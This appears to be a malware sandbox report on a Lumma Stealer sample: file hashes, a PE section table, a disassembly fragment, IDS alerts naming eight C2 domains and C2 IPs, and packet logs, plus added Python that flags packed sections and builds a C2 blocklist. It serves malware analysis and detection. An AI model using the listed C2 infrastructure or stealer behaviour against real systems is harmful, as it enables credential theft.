                                                          SHA-512:8AC93514B994198013FFE531087F36179A8B1ECCD9317DE35672C2F5D311168D2DBA9A2C062FE63473D35460CD9E9D71B640B441147FF10B1BB6F2A34382D6D4
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.8.8.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4542
                                                          Entropy (8bit):4.42167074576792
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zscJg77aI99SWpW8VY/Ym8M4JjlF4+q8CtkiOTd:uIjfaI7rz7V/JsdjOTd
                                                          MD5:B0EB039BBA02F01B8D2D230762A36344
                                                          SHA1:9689E8C295337C87A3F0214ED7FA5E7B60443A26
                                                          SHA-256:EF5753BD7AFFB10EC459825CE4BC18975DFDA70D7BE7A5BEC5E1E4CFFD8CA999
                                                          SHA-512:BFBF7BC10AFC9A192F92C0EAE7AFE6C7D53E2C179CD1A04714A56F265138AE9BB6B6CCA3D515C4717CB30F0C219EE17E257F525857CC693DA04E28BD7857730A
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542634" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.465308991916192
                                                          Encrypted:false
                                                          SSDEEP:6144:AIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb3:FXD94+WlLZMM6YFH1+3
                                                          MD5:9083EB01645F54765CCB6D70E2DCA4DC
                                                          SHA1:44A83CD3B16541706D19E2DEE62E7007603E2E3B
                                                          SHA-256:601B38CE29BE37B39D93D8E772990DEC6F85F29323DA86198EC2A868CE42A745
                                                          SHA-512:07DD5441EBB44DA04439875D26CFD7A65D1D0B809342821D1B84E019535362AB4BB3F9A76BBEC3698420AA983D518E0C3D68F0DE05D30B453F970E3C26C6A6D0
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................2..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.5382012064967485
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:file.exe
                                                          File size:2'963'456 bytes
                                                          MD5:e6f6b8cea53e7f4747e424f1617f3393
                                                          SHA1:59c199c720a2e106822defba032c2eb90f9699da
                                                          SHA256:95b1cfb989f22fc872400433acaa047fc01be081433137307523e4d116390598
                                                          SHA512:dbf6884718d3d08964897c5e002a7316081a6d38d4b68dc0220863eacc9a6f6108af7fa7dbfcac11a6a5008cc79a61db8d73daa628e7c3f6581c5973b7c66d3d
                                                          SSDEEP:49152:gWMmSUIIBPsnQjJqwBowbUX8Xg8WBYHbfoPjivt:gmSUIIBPsnYJ1BoeUXWg8X7wLiv
                                                          TLSH:08D53B73B5057ACFD44F57749527CE82985E0BF58B208CCBA828A4BE7D63CC119B9D28
                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@...........................0.....Y+....@.................................W...k..
                                                          Icon Hash:90cececece8e8eb0
                                                          Entrypoint:0x70b000
                                                          Entrypoint Section:.taggant
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                          Instruction
                                                          jmp 00007EFF18804A8Ah
                                                          movhps xmm5, qword ptr [00000000h]
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5f057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5f1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unprintable name) | 0x1000 | 0x5d000 | 0x25e00 | 0a46e0d6fc8a3ceb21203fd8572987c9 | False | 0.9995874587458746 | data | 7.9847073555245185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5e000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5f000 | 0x1000 | 0x200 | fe72def8b74193a84232a780098a7ce0 | False | 0.150390625 | data | 1.04205214219471 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uinrpldy | 0x60000 | 0x2aa000 | 0x2aa000 | 7b80793f2123004c04a2698650b36a60 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bdkjvfmn | 0x30a000 | 0x1000 | 0x600 | 3c8d0d8e539eaecb983a38d6adc32282 | False | 0.5364583333333334 | data | 4.7813212125482005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x30b000 | 0x3000 | 0x2200 | 054525355e8232a223e36678352cb116 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
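The section table above is the static evidence behind several of the report's signatures: the entry point sits in the non-standard `.taggant` section, one section has an unprintable name, every code-bearing section is mapped writable and executable, and the first section is 0x25e00 raw bytes at entropy 7.98 (ZLIB complexity 0.9996, i.e. already compressed or encrypted). The Python below is an added example, not Joe Sandbox code: it parses a PE32 section table with nothing but `struct`, computes per-section raw-data entropy and applies those checks. The PE it runs on is constructed in memory to mirror the shape of this table; the constructed section names, the 7.0 entropy threshold and the set of "standard" code sections are assumptions of the example, not values from the report.

```python
"""Added example (not Joe Sandbox code): parse a PE32 section table and apply
the static triage checks reflected in the report's section and entry-point
data: entry point outside the usual code sections, blank or non-printable
section names, writable+executable sections, near-8.0 entropy."""
import math
import random
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
# Assumption: section names treated as "standard" for an entry point.
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}
ENTROPY_PACKED = 7.0  # assumption: above this, raw data looks compressed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, approaching 8.0 for random data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a raw PE32 image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + i * 40                     # IMAGE_SECTION_HEADER is 40 bytes
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw_size": raw_size,
                         "chars": chars, "entropy": shannon_entropy(raw)})
    return entry_rva, sections


def triage(pe: bytes):
    """Return (name of the section holding the entry point, list of findings)."""
    entry_rva, sections = parse_sections(pe)
    findings, ep_section = [], None
    for s in sections:
        label = s["name"] or "<blank>"
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            ep_section = s["name"]
        if not s["name"] or not all(0x20 < ord(c) < 0x7F for c in s["name"]):
            findings.append(f"{label}: blank or non-printable section name")
        if s["chars"] & RWX == RWX:
            findings.append(f"{label}: writable and executable")
        if s["entropy"] > ENTROPY_PACKED:
            findings.append(f"{label}: entropy {s['entropy']:.2f}, likely packed/encrypted")
    if ep_section not in STANDARD_CODE_SECTIONS:
        findings.append(f"entry point {entry_rva:#x} lies in {ep_section!r}, outside standard code sections")
    return ep_section, findings


def build_sample_pe() -> bytes:
    """Constructed PE32 (not the analysed sample): a normal .text, a blank-named
    RWX section of pseudo-random bytes, and the entry point in a trailing
    '.taggant' section, mirroring the shape of the report's section table."""
    rng = random.Random(1)
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    rwx_init = IMAGE_SCN_CNT_INITIALIZED_DATA | RWX | IMAGE_SCN_MEM_READ
    layout = [  # (name, virtual address, raw bytes, characteristics)
        (".text", 0x1000, bytes(0x200), rx),
        ("", 0x2000, bytes(rng.randrange(256) for _ in range(0x1000)), rwx_init),
        (".taggant", 0x4000, b"\xe9" + bytes(0x1FF), rwx_init),  # starts with a jmp like the report
    ]
    entry_rva = 0x4000
    headers_size, raw_ptr, sec_hdrs, body = 0x400, 0x400, b"", b""
    for name, va, data, chars in layout:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                                len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        body += data
        raw_ptr += len(data)
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(0xE0, b"\0")
    return (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(headers_size, b"\0") + body


if __name__ == "__main__":
    section, findings = triage(build_sample_pe())
    print("entry point section:", repr(section))
    for f in findings:
        print(" -", f)
```

Run against a real file with `triage(open(path, "rb").read())`; the parser reads only the headers and the raw section bytes, so it works on the on-disk image without loading it. Entropy alone is not a verdict (signed, compressed resources also score high); it is the combination with RWX rights and an out-of-place entry point that makes the report's "unpacking" signatures worth chasing dynamically.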
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-14T06:52:05.178120+0200 | 2056471 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) | 1 | 192.168.2.4 | 61554 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.189242+0200 | 2056485 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) | 1 | 192.168.2.4 | 53766 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.200339+0200 | 2056483 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) | 1 | 192.168.2.4 | 63169 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.211010+0200 | 2056481 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) | 1 | 192.168.2.4 | 53209 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.221679+0200 | 2056479 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) | 1 | 192.168.2.4 | 58628 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.233741+0200 | 2056477 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) | 1 | 192.168.2.4 | 58554 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.250603+0200 | 2056475 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) | 1 | 192.168.2.4 | 50547 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:05.267741+0200 | 2056473 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) | 1 | 192.168.2.4 | 51153 | 1.1.1.1 | 53 | UDP
2024-10-14T06:52:06.634065+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP
2024-10-14T06:52:07.578747+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.53.8 | 443 | TCP
2024-10-14T06:52:07.578747+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.53.8 | 443 | TCP
2024-10-14T06:52:08.724141+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49732 | 104.21.53.8 | 443 | TCP
2024-10-14T06:52:08.724141+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 104.21.53.8 | 443 | TCP
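The eight DNS-lookup alerts fire within roughly 90 ms of each other, which is consistent with the sample trying a list of C2 domains in turn before the Steam profile lookup and the check-in to 104.21.53.8. The Python below is an added example, not Joe Sandbox or Suricata code: it takes the alert rows (copied from the table into a constructed list), refangs the domains out of the rule names into a blocklist, and flags any source that resolves several known-C2 domains inside a short window. The 1-second window and the threshold of four distinct domains are assumptions of the example, chosen to separate a burst like this one from a single stray lookup.

```python
"""Added example (not Joe Sandbox or Suricata code): turn the ET/ETPRO alert
rows into refanged IOCs and flag a host that resolves several known-C2
domains within a fraction of a second."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed from the alert table: (timestamp, SID, signature, source IP, dest IP, protocol).
# A subset suffices to show DNS rows being used and TCP rows being filtered out.
ALERTS = [
    ("2024-10-14T06:52:05.178120+0200", 2056471, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.189242+0200", 2056485, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.200339+0200", 2056483, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.211010+0200", 2056481, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.221679+0200", 2056479, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.233741+0200", 2056477, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.250603+0200", 2056475, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:05.267741+0200", 2056473, "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)", "192.168.2.4", "1.1.1.1", "UDP"),
    ("2024-10-14T06:52:06.634065+0200", 2858666, "ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup", "192.168.2.4", "104.102.49.254", "TCP"),
    ("2024-10-14T06:52:07.578747+0200", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", "192.168.2.4", "104.21.53.8", "TCP"),
]

# The rule names defang the domain as "(label .tld)"; this recovers "label.tld".
DEFANGED_RE = re.compile(r"\(([a-z0-9-]+) \.([a-z]+)\)\s*$")
TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%f%z"   # strptime's %z accepts "+0200"


def refang(signature: str):
    m = DEFANGED_RE.search(signature)
    return f"{m.group(1)}.{m.group(2)}" if m else None


def extract_domains(alerts):
    """Sorted, de-duplicated C2 domains from the DNS-lookup signatures."""
    return sorted({d for _, _, sig, *_ in alerts if (d := refang(sig))})


def dns_bursts(alerts, window=timedelta(seconds=1), min_distinct=4):
    """Assumed heuristic: >= min_distinct distinct C2 domains resolved by one
    source inside `window` is a burst. Returns {source_ip: sorted domains of
    the first burst found for that source}."""
    per_src = defaultdict(list)
    for ts, _, sig, src, _, proto in alerts:
        domain = refang(sig)
        if domain and proto == "UDP":          # DNS-lookup rows only
            per_src[src].append((datetime.strptime(ts, TS_FORMAT), domain))
    bursts = {}
    for src, events in per_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            seen = {d for t, d in events[i:] if t - t0 <= window}
            if len(seen) >= min_distinct:
                bursts[src] = sorted(seen)
                break
    return bursts


if __name__ == "__main__":
    for d in extract_domains(ALERTS):
        print("block:", d)
    for src, domains in dns_bursts(ALERTS).items():
        print(f"{src}: {len(domains)} C2 domains resolved within 1 s -> {domains}")
```

The burst check is deliberately keyed on the rule-derived domain, not the SID, so it still fires when ET rotates SIDs for new Lumma infrastructure; feeding it Suricata EVE JSON instead of the table only changes the tuple unpacking.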
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 06:52:05.302964926 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:05.303052902 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:05.303147078 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:05.308773994 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:05.308809042 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.038789034 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.038965940 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.042638063 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.042666912 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.043072939 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.086677074 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.091890097 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.135484934 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634102106 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634133101 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634202957 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634224892 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.634254932 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634305000 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634341002 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.634341002 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.634341955 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.634362936 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.634418011 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.635205984 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.935009956 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.935025930 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.935091972 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.935105085 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.935146093 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.935173988 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.935204029 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.935216904 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.935256004 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.935259104 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.935302973 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.938160896 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
Oct 14, 2024 06:52:06.938177109 CEST | 443 | 49730 | 104.102.49.254 | 192.168.2.4
Oct 14, 2024 06:52:06.938190937 CEST | 49730 | 443 | 192.168.2.4 | 104.102.49.254
